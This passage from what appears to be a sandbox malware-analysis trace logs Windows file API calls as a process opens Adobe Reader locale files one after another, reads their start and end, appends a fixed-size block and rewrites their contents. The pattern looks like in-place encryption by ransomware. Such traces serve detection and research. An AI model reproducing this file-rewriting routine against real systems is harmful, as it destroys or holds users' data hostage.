0x0 [0079.350] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0079.350] CloseHandle (hObject=0x1cc) returned 1 [0079.350] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\DEXShare.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\es_es\\services\\dexshare.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0079.351] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0079.351] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x9480 [0079.351] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0079.351] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.351] ReleaseMutex (hMutex=0x168) returned 1 [0079.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0079.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DEXShare.asfx", lpUsedDefaultChar=0x0) returned 13 [0079.352] ReadFile (in: hFile=0x1cc, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0079.358] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x8480 [0079.359] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.657] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x8480 [0079.657] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.657] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0079.658] WriteFile (in: hFile=0x1cc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0079.658] CloseHandle (hObject=0x1cc) returned 1 [0079.658] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Annots.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\annots.euq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0079.659] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0079.659] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x79000 [0079.659] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0079.659] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.659] ReleaseMutex (hMutex=0x168) returned 1 [0079.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.EUQ", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0079.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.EUQ", cchWideChar=10, lpMultiByteStr=0x1f7366c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Annots.EUQ", lpUsedDefaultChar=0x0) returned 10 [0079.660] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a4048, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a4048*, lpNumberOfBytesRead=0x359f278*=0x8000, lpOverlapped=0x0) returned 1 [0079.845] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x78000 [0079.846] ReadFile (in: hFile=0x1cc, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0080.985] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x78000 [0080.986] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0080.986] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0080.986] WriteFile (in: hFile=0x1cc, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x359f28c*=0x8000, lpOverlapped=0x0) returned 1 [0080.986] CloseHandle (hObject=0x1cc) returned 1 [0080.987] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\makeaccessible.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\makeaccessible.euq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0080.987] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0080.987] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x12e00 [0080.988] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0080.988] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0080.988] ReleaseMutex (hMutex=0x168) returned 1 [0080.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.EUQ", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0080.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.EUQ", cchWideChar=18, lpMultiByteStr=0x1f8867c, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="makeaccessible.EUQ", lpUsedDefaultChar=0x0) returned 18 [0080.988] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a8048, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a8048*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0080.999] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x11e00 [0080.999] ReadFile (in: hFile=0x1cc, lpBuffer=0x2667868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.064] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x11e00 [0081.064] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.265] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0081.266] WriteFile (in: hFile=0x1cc, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0081.266] CloseHandle (hObject=0x1cc) returned 1 [0081.266] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Search.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\search.euq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0081.267] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0081.267] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x5e00 [0081.267] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0081.267] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.267] ReleaseMutex (hMutex=0x168) returned 1 [0081.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.EUQ", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0081.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.EUQ", cchWideChar=10, lpMultiByteStr=0x1f735ec, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Search.EUQ", lpUsedDefaultChar=0x0) returned 10 [0081.268] ReadFile (in: hFile=0x1cc, lpBuffer=0x2665868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.355] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x4e00 [0081.355] ReadFile (in: hFile=0x1cc, lpBuffer=0x2696e48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2696e48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.389] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x4e00 [0081.389] WriteFile (in: hFile=0x1cc, lpBuffer=0x286ec88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x286ec88*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.390] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0081.390] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0081.390] CloseHandle (hObject=0x1cc) returned 1 [0081.390] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\Acroform.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\acroform.suo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0081.408] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0081.408] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x63a00 [0081.408] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0081.408] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.409] ReleaseMutex (hMutex=0x168) returned 1 [0081.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.SUO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.SUO", cchWideChar=12, lpMultiByteStr=0x1f7358c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Acroform.SUO", lpUsedDefaultChar=0x0) returned 12 [0081.409] ReadFile (in: hFile=0x1fc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0x8000, lpOverlapped=0x0) returned 1 [0081.428] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x62a00 [0081.428] ReadFile (in: hFile=0x1fc, lpBuffer=0x26698c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.446] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x62a00 [0081.446] WriteFile (in: hFile=0x1fc, lpBuffer=0x2867358*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.447] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0081.447] WriteFile (in: hFile=0x1fc, lpBuffer=0x28d0978*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28d0978*, lpNumberOfBytesWritten=0x359f28c*=0x8000, lpOverlapped=0x0) returned 1 [0081.447] CloseHandle (hObject=0x1fc) returned 1 [0081.447] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\EScript.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\escript.suo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0081.448] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0081.448] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xa200 [0081.448] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0081.448] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.448] ReleaseMutex (hMutex=0x168) returned 1 [0081.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.SUO", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0081.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.SUO", cchWideChar=11, lpMultiByteStr=0x1f7342c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EScript.SUO", lpUsedDefaultChar=0x0) returned 11 [0081.449] ReadFile (in: hFile=0x1fc, lpBuffer=0x25a8048, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a8048*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0081.492] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x9200 [0081.492] ReadFile (in: hFile=0x1fc, lpBuffer=0x26698c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.556] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x9200 [0081.557] WriteFile (in: hFile=0x1fc, lpBuffer=0x26698c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.557] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0081.557] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0081.557] CloseHandle (hObject=0x1fc) returned 1 [0081.557] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\reflow.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\reflow.suo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0081.558] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0081.558] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1200 [0081.558] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0081.558] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.559] ReleaseMutex (hMutex=0x168) returned 1 [0081.559] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.SUO", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0081.559] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.SUO", cchWideChar=10, lpMultiByteStr=0x1f7320c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="reflow.SUO", lpUsedDefaultChar=0x0) returned 10 [0081.559] ReadFile (in: hFile=0x1fc, lpBuffer=0x26698c8, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesRead=0x359f2bc*=0x1200, lpOverlapped=0x0) returned 1 [0081.581] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0081.581] WriteFile (in: hFile=0x1fc, lpBuffer=0x26698c8*, nNumberOfBytesToWrite=0x1788, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesWritten=0x359f2d0*=0x1788, lpOverlapped=0x0) returned 1 [0081.581] CloseHandle (hObject=0x1fc) returned 1 [0081.582] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\Weblink.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\weblink.suo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0081.582] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0081.583] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x6a00 [0081.583] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0081.583] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.583] ReleaseMutex (hMutex=0x168) returned 1 [0081.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.SUO", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0081.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.SUO", cchWideChar=11, lpMultiByteStr=0x1f7344c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Weblink.SUO", lpUsedDefaultChar=0x0) returned 11 [0081.583] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.598] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x5a00 [0081.599] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.614] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x5a00 [0081.614] WriteFile (in: hFile=0x1fc, lpBuffer=0x26698c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.614] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0081.614] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, 